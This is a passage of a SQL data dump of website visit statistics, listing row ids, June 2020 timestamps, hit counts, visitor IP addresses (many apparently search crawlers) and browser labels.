38961,1,1,0,0,'207.46.13.138','other'),(512833,1591939213,1,1,0,0,'66.249.70.72','chrome'),(512834,1591939414,1,1,0,0,'66.249.70.70','chrome'),(512835,1591939524,1,1,0,0,'157.55.39.191','other'),(512836,1591939693,1,1,0,0,'176.107.178.60','chrome'),(512837,1591940317,1,0,1,0,'66.249.70.72',''),(512838,1591940368,1,1,0,0,'66.249.70.70','chrome'),(512839,1591940460,1,1,0,0,'157.55.39.11','other'),(512840,1591941070,1,1,0,0,'178.154.200.222','other'),(512841,1591941607,1,1,0,0,'17.58.99.7','other'),(512842,1591941623,1,1,0,0,'157.55.39.191','other'),(512843,1591941770,2,2,0,0,'66.249.70.70','chrome'),(512844,1591941830,1,1,0,0,'51.91.129.4','firefox'),(512845,1591942020,2,2,0,0,'66.249.70.69','chrome'),(512846,1591942049,1,1,0,0,'157.55.39.52','other'),(512847,1591942220,1,1,0,0,'37.73.218.182','chrome'),(512848,1591942901,1,1,0,0,'178.133.241.122','chrome'),(512849,1591943003,1,1,0,0,'31.173.80.246','chrome'),(512850,1591944507,1,1,0,0,'91.196.177.207','chrome'),(512851,1591945020,1,1,0,0,'91.196.178.182','chrome'),(512852,1591945245,1,1,0,0,'66.249.64.36','chrome'),(512853,1591945445,1,1,0,0,'66.249.70.72','chrome'),(512854,1591945860,2,2,0,0,'8.29.198.26','other'),(512855,1591946367,1,1,0,0,'66.249.70.69','chrome'),(512856,1591947261,1,1,0,0,'66.249.70.70','chrome'),(512857,1591947361,1,1,0,0,'131.220.6.152','chrome'),(512858,1591947521,2,2,0,0,'116.202.203.237','other'),(512859,1591947525,1,1,0,0,'116.202.203.237','chrome'),(512860,1591947720,2,2,0,0,'66.249.70.72','chrome'),(512861,1591949053,1,1,0,0,'66.249.70.80','chrome'),(512862,1591949280,2,2,0,0,'66.249.64.38','chrome'),(512863,1591949558,1,1,0,0,'66.249.70.70','chrome'),(512864,1591949876,1,1,0,0,'91.124.162.57','chrome'),(512865,1591950308,8,8,0,0,'77.120.98.235','other'),(512866,1591950614,1,1,0,0,'207.46.13.138','other'),(512867,1591951114,1,1,0,0,'66.249.70.70','chrome'),(512868,1591951288,2,2,0,0,'66.249.70.69','chrome'),(512869,1591951948,8,8,0,0,'77.120.98.235','other'),(512870,1591952457,1,1,0,0,'66.249.70.72','chrome'),(512871,1591952995,1,1,0,0,'95.134.171.75','chrome'),(512872,1591953159,1,1,0,0,'66.249.70.70','chrome'),(512873,1591953321,1,1,0,0,'207.46.13.138','other'),(512874,1591953719,8,8,0,0,'77.120.98.235','other'),(512875,1591954462,1,1,0,0,'66.249.70.72','chrome'),(512876,1591954851,1,1,0,0,'66.249.70.70','chrome'),(512877,1591955270,1,1,0,0,'3.134.108.81','chrome'),(512878,1591955566,1,1,0,0,'213.180.203.16','other'),(512879,1591955944,8,8,0,0,'77.120.98.235','other'),(512880,1591956693,1,1,0,0,'8.29.198.27','other'),(512881,1591956712,1,1,0,0,'8.29.198.26','other'),(512882,1591956748,1,1,0,0,'91.196.178.71','chrome'),(512883,1591956749,2,2,0,0,'66.249.70.69','chrome'),(512884,1591956935,1,1,0,0,'213.180.203.72','other'),(512885,1591957845,3,3,0,0,'66.249.70.69','chrome'),(512886,1591958143,1,1,0,0,'157.55.39.191','other'),(512887,1591958275,8,8,0,0,'77.120.98.235','other'),(512888,1591958401,1,1,0,0,'66.249.70.70','chrome'),(512889,1591959580,1,1,0,0,'109.74.154.72','chrome'),(512890,1591959845,1,1,0,0,'66.249.64.33','chrome'),(512891,1591960436,1,1,0,0,'66.249.70.72','chrome'),(512892,1591960496,1,1,0,0,'207.46.13.138','other'),(512893,1591960661,1,1,0,0,'66.249.70.70','chrome'),(512894,1591961222,1,1,0,0,'213.180.203.109','other'),(512895,1591961730,1,1,0,0,'66.249.70.70','chrome'),(512896,1591962105,2,2,0,0,'66.249.70.72','chrome'),(512897,1591962204,1,1,0,0,'207.46.13.138','other'),(512898,1591962269,1,1,0,0,'45.12.220.168','other'),(512899,1591962578,2,2,0,0,'66.249.70.69','chrome'),(512900,1591963036,1,1,0,0,'66.249.70.70','chrome'),(512901,1591963488,1,1,0,0,'66.249.64.36','chrome'),(512902,1591964027,1,1,0,0,'66.249.70.70','chrome'),(512903,1591964132,1,1,0,0,'66.249.70.72','chrome'),(512904,1591965069,1,1,0,0,'213.180.203.17','other'),(512905,1591965679,1,1,0,0,'66.249.70.72','chrome'),(512906,1591965924,1,1,0,0,'157.55.39.191','other'),(512907,1591966299,1,1,0,0,'157.55.39.52','other'),(512908,1591967522,2,2,0,0,'8.29.198.25','other'),(512909,1591967636,1,1,0,0,'213.180.203.16','other'),(512910,1591967828,1,1,0,0,'66.249.70.72','chrome'),(512911,1591967914,1,1,0,0,'66.249.70.70','chrome'),(512912,1591967992,8,8,0,0,'185.11.82.228','other'),(512913,1591968836,2,2,0,0,'66.249.70.70','chrome'),(512914,1591968888,1,1,0,0,'207.46.13.138','other'),(512915,1591969385,8,8,0,0,'185.11.82.228','other'),(512916,1591969518,1,1,0,0,'207.46.13.200','other'),(512917,1591969703,1,1,0,0,'157.55.39.52','other'),(512918,1591970245,2,2,0,0,'66.249.70.69','chrome'),(512919,1591970384,1,1,0,0,'66.249.70.70','chrome'),(512920,1591970752,1,1,0,0,'157.55.39.52','other'),(512921,1591970827,1,1,0,0,'66.249.70.72','chrome'),(512922,1591971602,3,3,0,0,'207.46.13.200','other'),(512923,1591971628,1,1,0,0,'66.249.70.70','chrome'),(512924,1591972161,1,1,0,0,'157.55.39.191','other'),(512925,1591972480,1,1,0,0,'66.249.70.69','chrome'),(512926,1591972512,1,1,0,0,'178.154.200.222','other'),(512927,1591973537,1,1,0,0,'178.154.200.220','chrome'),(512928,1591973562,1,1,0,0,'213.180.203.16','other'),(512929,1591974010,1,1,0,0,'66.249.70.69','chrome'),(512930,1591974114,2,2,0,0,'66.249.70.70','chrome'),(512931,1591974159,1,1,0,0,'209.17.96.66','other'),(512932,1591974297,8,8,0,0,'185.11.82.228','other'),(512933,1591974828,1,1,0,0,'157.55.39.52','other'),(512934,1591974922,9,9,0,0,'94.130.9.183','other'),(512935,1591975271,1,1,0,0,'66.249.70.69','chrome'),(512936,1591975599,1,1,0,0,'207.46.13.200','other'),(512937,1591975757,8,8,0,0,'185.11.82.228','other'),(512938,1591975823,5,5,0,0,'94.130.9.183','other'),(512939,1591975853,1,1,0,0,'66.249.70.72','chrome'),(512940,1591975954,1,1,0,0,'157.55.39.52','other'),(512941,1591975984,1,1,0,0,'66.249.70.70','chrome'),(512942,1591976775,1,1,0,0,'66.249.70.69','chrome'),(512943,1591977152,8,8,0,0,'185.11.82.228','other'),(512944,1591977429,1,1,0,0,'157.55.39.52','other'),(512945,1591977853,1,1,0,0,'66.249.70.70','chrome'),(512946,1591977975,2,1,1,0,'66.249.70.69',''),(512947,1591978287,2,2,0,0,'207.46.13.200','other'),(512948,1591978358,2,2,0,0,'8.29.198.27','other'),(512949,1591978471,1,1,0,0,'66.249.70.72','chrome'),(512950,1591978488,3,3,0,0,'66.249.70.69','chrome'),(512951,1591978506,1,1,0,0,'157.55.39.52','other'),(512952,1591978572,8,8,0,0,'185.11.82.228','other'),(512953,1591979549,1,1,0,0,'66.249.70.69','chrome'),(512954,1591980004,8,8,0,0,'185.11.82.228','other'),(512955,1591980064,1,1,0,0,'207.46.13.200','other'),(512956,1591980410,1,1,0,0,'66.249.64.36','chrome'),(512957,1591980756,1,1,0,0,'213.180.203.140','other'),(512958,1591981416,8,8,0,0,'185.11.82.228','other'),(512959,1591982096,1,1,0,0,'91.196.178.70','chrome'),(512960,1591982343,1,1,0,0,'157.55.39.52','other'),(512961,1591982633,1,1,0,0,'62.210.83.78','firefox'),(512962,1591982735,1,1,0,0,'154.51.131.142','chrome'),(512963,1591982826,8,8,0,0,'185.11.82.228','other'),(512964,1591982870,1,1,0,0,'92.38.136.69','chrome'),(512965,1591983175,2,2,0,0,'66.249.70.72','chrome'),(512966,1591983804,1,1,0,0,'157.55.39.52','other'),(512967,1591984077,1,1,0,0,'176.59.202.25','chrome'),(512968,1591984245,8,8,0,0,'185.11.82.228','other'),(512969,1591984488,2,2,0,0,'66.249.70.70','chrome'),(512970,1591984508,1,1,0,0,'178.154.200.222','other'),(512971,1591984662,2,2,0,0,'66.249.70.69','chrome'),(512972,1591984802,1,1,0,0,'91.196.178.21','chrome'),(512973,1591984949,2,2,0,0,'66.249.70.72','chrome'),(512974,1591985132,1,1,0,0,'157.55.39.52','other'),(512975,1591985516,1,1,0,0,'66.249.64.33','chrome'),(512976,1591985635,1,1,0,0,'207.46.13.115','other'),(512977,1591985671,8,8,0,0,'185.11.82.228','other'),(512978,1591986871,1,1,0,0,'66.249.70.69','chrome'),(512979,1591987099,8,8,0,0,'185.11.82.228','other'),(512980,1591988078,1,1,0,0,'17.58.99.7','other'),(512981,1591988090,1,1,0,0,'91.196.178.77','firefox'),(512982,1591988219,1,1,0,0,'66.249.70.72','chrome'),(512983,1591988486,8,8,0,0,'185.11.82.228','other'),(512984,1591988888,1,1,0,0,'66.249.70.69','chrome'),(512985,1591988997,1,1,0,0,'207.46.13.200','other'),(512986,1591989190,2,2,0,0,'8.29.198.27','other'),(512987,1591989899,8,8,0,0,'185.11.82.228','other'),(512988,1591989949,1,1,0,0,'66.249.70.72','chrome'),(512989,1591989996,1,1,0,0,'157.55.39.52','other'),(512990,1591990758,1,1,0,0,'66.249.70.70','chrome'),(512991,1591991099,2,2,0,0,'157.55.39.52','other'),(512992,1591991325,8,8,0,0,'185.11.82.228','other'),(512993,1591991491,2,2,0,0,'91.209.11.236','other'),(512994,1591992193,1,1,0,0,'91.196.178.79','chrome'),(512995,1591992552,2,2,0,0,'66.249.70.72','chrome'),(512996,1591992715,8,8,0,0,'185.11.82.228','other'),(512997,1591992931,2,2,0,0,'91.209.11.236','other'),(512998,1591993005,1,1,0,0,'157.55.39.231','other'),(512999,1591993188,2,2,0,0,'66.249.70.69','chrome'),(513000,1591993544,1,1,0,0,'66.249.64.38','chrome'),(513001,1591993709,1,1,0,0,'178.154.200.19','other'),(513002,1591993736,1,1,0,0,'207.46.13.115','other'),(513003,1591993954,2,2,0,0,'91.209.11.236','other'),(513004,1591994131,8,8,0,0,'185.11.82.228','other'),(513005,1591994135,1,1,0,0,'178.154.200.97','other'),(513006,1591994671,2,2,0,0,'157.55.39.52','other'),(513007,1591994758,1,1,0,0,'64.202.184.249','firefox'),(513008,1591995068,1,1,0,0,'194.61.24.94','other'),(513009,1591995183,1,1,0,0,'91.209.11.236','other'),(513010,1591995256,1,1,0,0,'66.249.70.69','chrome'),(513011,1591995569,8,8,0,0,'185.11.82.228','other'),(513012,1591995688,1,1,0,0,'66.249.70.72','chrome'),(513013,1591996017,1,1,0,0,'207.46.13.115','other'),(513014,1591996074,1,1,0,0,'66.249.70.70','chrome'),(513015,1591996957,8,8,0,0,'185.11.82.228','other'),(513016,1591998365,8,8,0,0,'185.11.82.228','other'),(513017,1591999003,2,1,1,0,'66.249.70.69',''),(513018,1591999185,1,1,0,0,'207.46.13.25','other'),(513019,1591999227,1,1,0,0,'66.249.70.72','chrome'),(513020,1591999272,2,2,0,0,'66.249.70.69','chrome'),(513021,1591999328,1,1,0,0,'66.249.70.70','chrome'),(513022,1591999510,1,1,0,0,'178.154.200.222','other'),(513023,1591999732,8,8,0,0,'185.11.82.228','other'),(513024,1591999769,1,1,0,0,'157.55.39.52','other'),(513025,1592000020,1,1,0,0,'8.29.198.26','other'),(513026,1592000036,1,1,0,0,'8.29.198.27','other'),(513027,1592000080,1,1,0,0,'207.46.13.200','other'),(513028,1592000584,2,2,0,0,'66.249.70.72','chrome'),(513029,1592001118,8,8,0,0,'185.11.82.228','other'),(513030,1592001332,1,1,0,0,'66.249.70.70','chrome'),(513031,1592001488,1,1,0,0,'66.249.70.72','chrome'),(513032,1592001775,2,2,0,0,'66.249.64.38','chrome'),(513033,1592002215,1,1,0,0,'178.154.200.92','other'),(513034,1592002483,8,8,0,0,'185.11.82.228','other'),(513035,1592002836,3,3,0,0,'66.249.70.69','chrome'),(513036,1592003349,1,1,0,0,'66.249.70.70','chrome'),(513037,1592003852,8,8,0,0,'185.11.82.228','other'),(513038,1592003970,1,1,0,0,'35.239.22.79','other'),(513039,1592004732,1,1,0,0,'66.249.70.70','chrome'),(513040,1592004758,1,1,0,0,'66.249.70.69','chrome'),(513041,1592004797,1,1,0,0,'46.101.179.164','firefox'),(513042,1592004961,1,1,0,0,'157.55.39.52','other'),(513043,1592005060,1,1,0,0,'207.46.13.200','other'),(513044,1592005227,8,8,0,0,'185.11.82.228','other'),(513045,1592005922,3,3,0,0,'95.217.115.62','other'),(513046,1592006106,1,1,0,0,'62.205.134.182','other'),(513047,1592006488,1,1,0,0,'66.249.64.33','chrome'),(513048,1592006592,8,8,0,0,'185.11.82.228','other'),(513049,1592006636,1,1,0,0,'66.249.70.70','chrome'),(513050,1592006697,1,1,0,0,'66.249.70.69','chrome'),(513051,1592007953,8,8,0,0,'185.11.82.228','other'),(513052,1592008368,3,2,1,0,'66.249.70.70',''),(513053,1592009301,8,8,0,0,'185.11.82.228','other'),(513054,1592009322,2,2,0,0,'207.46.13.200','other'),(513055,1592009349,2,2,0,0,'207.46.13.25','other'),(513056,1592009583,2,2,0,0,'157.55.39.52','other'),(513057,1592010175,1,1,0,0,'66.249.64.36','chrome'),(513058,1592010541,1,1,0,0,'66.249.70.70','chrome'),(513059,1592010616,1,1,0,0,'157.55.39.52','other'),(513060,1592010628,8,8,0,0,'185.11.82.228','other'),(513061,1592010723,2,2,0,0,'66.249.70.72','chrome'),(513062,1592010848,1,1,0,0,'8.29.198.26','other'),(513063,1592010858,1,1,0,0,'8.29.198.25','other'),(513064,1592011271,2,2,0,0,'66.249.64.33','chrome'),(513065,1592011279,1,1,0,0,'178.154.200.87','other'),(513066,1592011997,8,8,0,0,'185.11.82.228','other'),(513067,1592012163,1,1,0,0,'66.249.70.69','chrome'),(513068,1592012311,1,1,0,0,'66.249.70.70','chrome'),(513069,1592012376,1,0,1,0,'66.249.70.72',''),(513070,1592013258,8,8,0,0,'185.11.82.228','other'),(513071,1592013670,1,1,0,0,'66.249.64.36','chrome'),(513072,1592014127,1,1,0,0,'157.55.39.191','other'),(513073,1592014146,2,2,0,0,'66.249.70.69','chrome'),(513074,1592014531,8,8,0,0,'185.11.82.228','other'),(513075,1592015501,1,1,0,0,'66.249.70.69','chrome'),(513076,1592015790,8,8,0,0,'185.11.82.228','other'),(513077,1592016593,1,1,0,0,'157.55.39.191','other'),(513078,1592016719,1,1,0,0,'74.208.228.35','firefox'),(513079,1592017028,1,1,0,0,'66.249.70.72','chrome'),(513080,1592017032,1,0,1,0,'66.249.70.69',''),(513081,1592017085,1,1,0,0,'66.249.70.69','chrome'),(513082,1592017092,8,8,0,0,'185.11.82.228','other'),(513083,1592017677,1,1,0,0,'66.249.64.33','chrome'),(513084,1592018388,1,1,0,0,'207.46.13.200','other'),(513085,1592018389,8,8,0,0,'185.11.82.228','other'),(513086,1592018636,1,1,0,0,'45.136.108.44','other'),(513087,1592019656,8,8,0,0,'185.11.82.228','other'),(513088,1592019933,1,1,0,0,'66.249.64.33','chrome'),(513089,1592020899,8,8,0,0,'185.11.82.228','other'),(513090,1592021683,1,1,0,0,'8.29.198.25','other'),(513091,1592021684,1,1,0,0,'8.29.198.26','other'),(513092,1592022182,8,8,0,0,'185.11.82.228','other'),(513093,1592022256,1,1,0,0,'80.95.45.178','chrome'),(513094,1592023442,8,8,0,0,'185.11.82.228','other'),(513095,1592023450,1,1,0,0,'66.249.70.69','chrome'),(513096,1592023774,1,1,0,0,'62.205.134.182','other'),(513097,1592024143,1,1,0,0,'207.46.13.200','other'),(513098,1592024545,1,1,0,0,'17.58.99.7','other'),(513099,1592024712,2,1,1,0,'66.249.64.33',''),(513100,1592024715,8,8,0,0,'185.11.82.228','other'),(513101,1592024779,1,1,0,0,'66.249.64.33','chrome'),(513102,1592024885,2,1,1,0,'66.249.70.69',''),(513103,1592025097,1,1,0,0,'66.249.70.72','chrome'),(513104,1592025126,1,1,0,0,'157.55.39.191','other'),(513105,1592025884,1,1,0,0,'178.154.200.196','other'),(513106,1592025989,8,8,0,0,'185.11.82.228','other'),(513107,1592026111,1,1,0,0,'66.249.70.70','chrome'),(513108,1592026275,1,1,0,0,'66.249.64.38','chrome'),(513109,1592026835,1,1,0,0,'17.58.99.7','other'),(513110,1592027263,8,8,0,0,'185.11.82.228','other'),(513111,1592027886,1,1,0,0,'207.46.13.200','other'),(513112,1592028380,1,1,0,0,'207.46.13.47','other'),(513113,1592028541,8,8,0,0,'185.11.82.228','other'),(513114,1592028719,1,1,0,0,'213.180.203.16','other'),(513115,1592028874,1,1,0,0,'178.154.200.222','other'),(513116,1592029110,1,1,0,0,'66.249.70.69','chrome'),(513117,1592029111,1,0,1,0,'66.249.70.72',''),(513118,1592029936,8,8,0,0,'185.11.82.228','other'),(513119,1592030366,1,1,0,0,'66.249.70.70','chrome'),(513120,1592030975,1,1,0,0,'66.249.70.69','chrome'),(513121,1592031124,1,1,0,0,'17.58.99.7','other'),(513122,1592031380,8,8,0,0,'185.11.82.228','other'),(513123,1592031401,1,1,0,0,'66.249.70.70','chrome'),(513124,1592031885,1,1,0,0,'66.249.70.72','chrome'),(513125,1592032032,1,1,0,0,'17.58.99.7','other'),(513126,1592032061,1,1,0,0,'157.55.39.52','other'),(513127,1592032085,1,1,0,0,'66.249.70.69','chrome'),(513128,1592032512,1,1,0,0,'8.29.198.25','other'),(513129,1592032514,1,1,0,0,'8.29.198.27','other'),(513130,1592032825,2,2,0,0,'66.249.70.70','chrome'),(513131,1592032849,8,8,0,0,'185.11.82.228','other'),(513132,1592033648,1,1,0,0,'66.249.64.36','chrome'),(513133,1592033649,1,0,1,0,'66.249.64.33',''),(513134,1592033693,1,1,0,0,'131.220.6.152','chrome'),(513135,1592033955,1,1,0,0,'66.249.70.70','chrome'),(513136,1592034275,8,8,0,0,'185.11.82.228','other'),(513137,1592034589,1,1,0,0,'17.58.99.7','other'),(513138,1592035033,2,2,0,0,'66.249.70.69','chrome'),(513139,1592035681,8,8,0,0,'185.11.82.228','other'),(513140,1592035686,1,1,0,0,'66.249.70.72','chrome'),(513141,1592035856,1,1,0,0,'66.102.9.167','chrome'),(513142,1592035972,1,1,0,0,'66.249.70.70','chrome'),(513143,1592036447,1,1,0,0,'195.49.149.77','chrome'),(513144,1592037068,8,8,0,0,'185.11.82.228','other'),(513145,1592037329,2,2,0,0,'66.249.70.70','chrome'),(513146,1592037433,1,1,0,0,'66.249.70.72','chrome'),(513147,1592037635,1,1,0,0,'66.249.70.69','chrome'),(513148,1592037696,1,1,0,0,'178.92.170.90','chrome'),(513149,1592038456,8,8,0,0,'185.11.82.228','other'),(513150,1592038738,1,1,0,0,'66.249.64.36','chrome'),(513151,1592039583,1,1,0,0,'192.71.142.35','other'),(513152,1592039862,8,8,0,0,'185.11.82.228','other'),(513153,1592040513,1,1,0,0,'213.180.203.140','other'),(513154,1592040668,1,1,0,0,'66.249.75.198','chrome'),(513155,1592040876,2,2,0,0,'66.249.70.69','chrome'),(513156,1592040926,2,2,0,0,'93.175.236.59','chrome'),(513157,1592041125,1,0,1,0,'66.249.70.70',''),(513158,1592041253,8,8,0,0,'185.11.82.228','other'),(513159,1592041685,1,1,0,0,'66.249.64.36','chrome'),(513160,1592041828,1,1,0,0,'157.55.39.52','other'),(513161,1592042207,1,1,0,0,'66.249.70.72','chrome'),(513162,1592042661,8,8,0,0,'185.11.82.228','other'),(513163,1592043338,2,2,0,0,'8.29.198.27','other'),(513164,1592043633,2,2,0,0,'66.249.70.69','chrome'),(513165,1592043650,1,1,0,0,'66.249.64.36','chrome'),(513166,1592043922,1,1,0,0,'80.240.31.63','other'),(513167,1592044125,8,8,0,0,'185.11.82.228','other'),(513168,1592044572,1,1,0,0,'66.249.64.36','chrome'),(513169,1592044694,2,2,0,0,'66.249.70.69','chrome'),(513170,1592044854,1,1,0,0,'157.55.39.229','other'),(513171,1592044986,1,1,0,0,'109.74.154.72','chrome'),(513172,1592045424,1,1,0,0,'66.249.70.72','chrome'),(513173,1592045545,8,8,0,0,'185.11.82.228','other'),(513174,1592045641,1,1,0,0,'66.249.70.70','chrome'),(513175,1592047092,8,8,0,0,'185.11.82.228','other'),(513176,1592048311,1,1,0,0,'66.249.70.69','chrome'),(513177,1592048484,2,2,0,0,'157.55.39.52','other'),(513178,1592048489,1,1,0,0,'157.55.39.229','other'),(513179,1592048595,8,8,0,0,'185.11.82.228','other'),(513180,1592048729,1,1,0,0,'66.249.70.72','chrome'),(513181,1592049763,1,1,0,0,'66.249.70.72','chrome'),(513182,1592050170,8,8,0,0,'185.11.82.228','other'),(513183,1592051769,8,8,0,0,'185.11.82.228','other'),(513184,1592052120,1,1,0,0,'209.17.96.226','other'),(513185,1592052451,1,1,0,0,'94.23.182.97','firefox'),(513186,1592052470,1,1,0,0,'157.55.39.229','other'),(513187,1592053334,8,8,0,0,'185.11.82.228','other'),(513188,1592054173,2,2,0,0,'8.29.198.26','other'),(513189,1592054607,1,1,0,0,'66.249.64.36','chrome'),(513190,1592054885,1,1,0,0,'66.249.70.72','chrome'),(513191,1592054948,8,8,0,0,'185.11.82.228','other'),(513192,1592055074,1,1,0,0,'157.55.39.52','other'),(513193,1592056040,1,1,0,0,'157.55.39.52','other'),(513194,1592056415,1,1,0,0,'66.249.70.72','chrome'),(513195,1592056521,8,8,0,0,'185.11.82.228','other'),(513196,1592057956,2,1,1,0,'66.249.70.72',''),(513197,1592058187,8,8,0,0,'185.11.82.228','other'),(513198,1592058355,1,1,0,0,'66.249.64.33','chrome'),(513199,1592058591,1,1,0,0,'178.154.200.222','other'),(513200,1592059268,1,1,0,0,'66.249.70.72','chrome'),(513201,1592059776,8,8,0,0,'185.11.82.228','other'),(513202,1592060502,1,1,0,0,'66.249.70.69','chrome'),(513203,1592060829,1,1,0,0,'157.55.39.52','other'),(513204,1592061216,1,1,0,0,'66.249.64.36','chrome'),(513205,1592061336,8,8,0,0,'185.11.82.228','other'),(513206,1592061685,1,1,0,0,'66.249.70.72','chrome'),(513207,1592062161,1,1,0,0,'176.36.50.232','chrome'),(513208,1592062230,1,1,0,0,'91.201.225.83','chrome'),(513209,1592062589,1,1,0,0,'66.249.70.72','chrome'),(513210,1592062990,8,8,0,0,'185.11.82.228','other'),(513211,1592063398,1,1,0,0,'64.246.161.42','firefox'),(513212,1592063632,1,1,0,0,'78.111.189.149','chrome'),(513213,1592064233,2,2,0,0,'66.249.70.72','chrome'),(513214,1592064572,1,1,0,0,'88.198.146.180','other'),(513215,1592064713,8,8,0,0,'185.11.82.228','other'),(513216,1592064997,2,2,0,0,'8.29.198.27','other'),(513217,1592066425,8,8,0,0,'185.11.82.228','other'),(513218,1592066581,1,1,0,0,'66.249.64.36','chrome'),(513219,1592066763,1,1,0,0,'66.249.70.70','chrome'),(513220,1592067879,1,1,0,0,'17.58.99.7','other'),(513221,1592067974,8,8,0,0,'185.11.82.228','other'),(513222,1592068247,1,1,0,0,'213.180.203.154','other'),(513223,1592069441,8,8,0,0,'185.11.82.228','other'),(513224,1592070066,1,1,0,0,'178.154.200.222','other'),(513225,1592070782,8,8,0,0,'185.11.82.228','other'),(513226,1592071196,2,2,0,0,'178.154.200.222','other'),(513227,1592071351,1,1,0,0,'157.55.39.75','other'),(513228,1592071463,1,1,0,0,'157.55.39.52','other'),(513229,1592072123,8,8,0,0,'185.11.82.228','other'),(513230,1592072476,1,1,0,0,'66.249.70.69','chrome'),(513231,1592073368,1,1,0,0,'158.69.26.193','other'),(513232,1592073396,1,1,0,0,'158.69.26.193','chrome'),(513233,1592073412,1,1,0,0,'51.77.246.204','other'),(513234,1592073451,8,8,0,0,'185.11.82.228','other'),(513235,1592073850,1,1,0,0,'66.249.70.70','chrome'),(513236,1592074485,2,2,0,0,'66.249.70.69','chrome'),(513237,1592074780,8,8,0,0,'185.11.82.228','other'),(513238,1592075067,1,1,0,0,'213.180.203.16','other'),(513239,1592075259,1,1,0,0,'66.249.64.36','chrome'),(513240,1592075381,16,16,0,0,'178.218.218.2','other'),(513241,1592075439,1,1,0,0,'178.154.200.236','other'),(513242,1592075587,1,1,0,0,'178.154.200.222','other'),(513243,1592075758,1,1,0,0,'183.136.225.46','firefox'),(513244,1592075788,1,1,0,0,'157.55.39.75','other'),(513245,1592075829,2,2,0,0,'8.29.198.26','other'),(513246,1592076115,8,8,0,0,'185.11.82.228','other'),(513247,1592076374,1,1,0,0,'66.249.70.69','chrome'),(513248,1592076408,1,1,0,0,'194.61.24.94','other'),(513249,1592076576,1,1,0,0,'95.152.62.136','chrome'),(513250,1592076820,1,1,0,0,'178.154.200.216','other'),(513251,1592076902,2,2,0,0,'66.249.64.36','chrome'),(513252,1592077285,1,1,0,0,'66.249.70.70','chrome'),(513253,1592077474,8,8,0,0,'185.11.82.228','other'),(513254,1592078155,2,2,0,0,'66.249.64.36','chrome'),(513255,1592078315,1,1,0,0,'47.108.80.103','other'),(513256,1592078546,1,1,0,0,'66.249.70.72','chrome'),(513257,1592078835,8,8,0,0,'185.11.82.228','other'),(513258,1592078963,2,2,0,0,'66.249.70.70','chrome'),(513259,1592079325,1,1,0,0,'178.154.200.222','other'),(513260,1592080202,8,8,0,0,'185.11.82.228','other'),(513261,1592080250,1,1,0,0,'66.249.70.72','chrome'),(513262,1592080311,3,3,0,0,'66.249.70.70','chrome'),(513263,1592080537,1,1,0,0,'66.249.64.38','chrome'),(513264,1592080624,1,1,0,0,'66.249.70.69','chrome'),(513265,1592081018,1,1,0,0,'213.180.203.16','other'),(513266,1592081525,1,1,0,0,'17.58.99.7','other'),(513267,1592081587,8,8,0,0,'185.11.82.228','other'),(513268,1592081694,1,1,0,0,'66.249.64.38','chrome'),(513269,1592082311,1,1,0,0,'66.249.70.69','chrome'),(513270,1592082403,1,1,0,0,'66.249.70.72','chrome'),(513271,1592082485,1,1,0,0,'66.249.70.70','chrome'),(513272,1592082993,8,8,0,0,'185.11.82.228','other'),(513273,1592083234,1,1,0,0,'207.46.13.200','other'),(513274,1592083644,1,1,0,0,'213.180.203.16','other'),(513275,1592083755,1,1,0,0,'66.249.70.70','chrome'),(513276,1592084141,1,1,0,0,'183.136.225.46','firefox'),(513277,1592084241,1,1,0,0,'66.249.70.72','chrome'),(513278,1592084365,8,8,0,0,'185.11.82.228','other'),(513279,1592084711,1,1,0,0,'128.124.76.1','chrome'),(513280,1592085137,2,2,0,0,'66.249.70.69','chrome'),(513281,1592085767,8,8,0,0,'185.11.82.228','other'),(513282,1592086068,1,1,0,0,'66.249.70.72','chrome'),(513283,1592086540,1,0,1,0,'66.249.70.69',''),(513284,1592086541,1,1,0,0,'66.249.70.70','chrome'),(513285,1592086567,1,1,0,0,'207.46.13.214','other'),(513286,1592086658,2,2,0,0,'8.29.198.25','other'),(513287,1592086899,1,1,0,0,'157.55.39.230','other'),(513288,1592086997,1,1,0,0,'157.55.39.120','other'),(513289,1592087094,1,1,0,0,'66.249.70.69','chrome'),(513290,1592087201,8,8,0,0,'185.11.82.228','other'),(513291,1592087505,2,2,0,0,'17.58.99.7','other'),(513292,1592087607,1,1,0,0,'66.249.70.72','chrome'),(513293,1592087633,2,2,0,0,'66.249.70.70','chrome'),(513294,1592087642,1,1,0,0,'66.249.64.36','chrome'),(513295,1592087652,3,3,0,0,'207.46.13.214','other'),(513296,1592087963,1,1,0,0,'66.249.64.38','chrome'),(513297,1592088682,8,8,0,0,'185.11.82.228','other'),(513298,1592089050,3,3,0,0,'66.249.70.72','chrome'),(513299,1592089412,1,1,0,0,'207.46.13.214','other'),(513300,1592089433,1,1,0,0,'66.249.64.36','chrome'),(513301,1592089468,1,1,0,0,'66.249.64.33','chrome'),(513302,1592090148,8,8,0,0,'185.11.82.228','other'),(513303,1592090304,3,3,0,0,'157.55.39.75','other'),(513304,1592090515,1,1,0,0,'178.154.200.220','other'),(513305,1592090642,1,1,0,0,'213.180.203.190','other'),(513306,1592090702,2,2,0,0,'66.249.70.69','chrome'),(513307,1592091336,1,1,0,0,'66.249.64.38','chrome'),(513308,1592091338,1,1,0,0,'66.249.64.33','chrome'),(513309,1592091381,1,1,0,0,'66.249.70.70','chrome'),(513310,1592091545,8,8,0,0,'185.11.82.228','other'),(513311,1592091587,1,1,0,0,'213.180.203.169','other'),(513312,1592091794,1,1,0,0,'3.235.228.222','chrome'),(513313,1592091994,2,2,0,0,'157.55.39.75','other'),(513314,1592092413,1,1,0,0,'157.55.39.52','other'),(513315,1592092507,1,1,0,0,'62.205.134.182','other'),(513316,1592092624,2,2,0,0,'66.249.70.72','chrome'),(513317,1592092763,1,1,0,0,'66.249.70.69','chrome'),(513318,1592092994,8,8,0,0,'185.11.82.228','other'),(513319,1592093627,1,1,0,0,'207.46.13.214','other'),(513320,1592093963,1,1,0,0,'157.55.39.59','other'),(513321,1592094449,8,8,0,0,'185.11.82.228','other'),(513322,1592094843,1,1,0,0,'207.46.13.214','other'),(513323,1592095111,2,2,0,0,'66.249.70.72','chrome'),(513324,1592095407,3,3,0,0,'66.249.70.70','chrome'),(513325,1592095564,1,1,0,0,'66.249.70.69','chrome'),(513326,1592095767,8,8,0,0,'185.11.82.228','other'),(513327,1592095909,1,1,0,0,'157.55.39.52','other'),(513328,1592096346,1,1,0,0,'66.249.70.70','chrome'),(513329,1592096459,1,1,0,0,'66.249.70.72','chrome'),(513330,1592096746,1,1,0,0,'66.249.64.38','chrome'),(513331,1592097088,8,8,0,0,'185.11.82.228','other'),(513332,1592097481,2,2,0,0,'8.29.198.25','other'),(513333,1592097589,3,3,0,0,'66.249.70.72','chrome'),(5133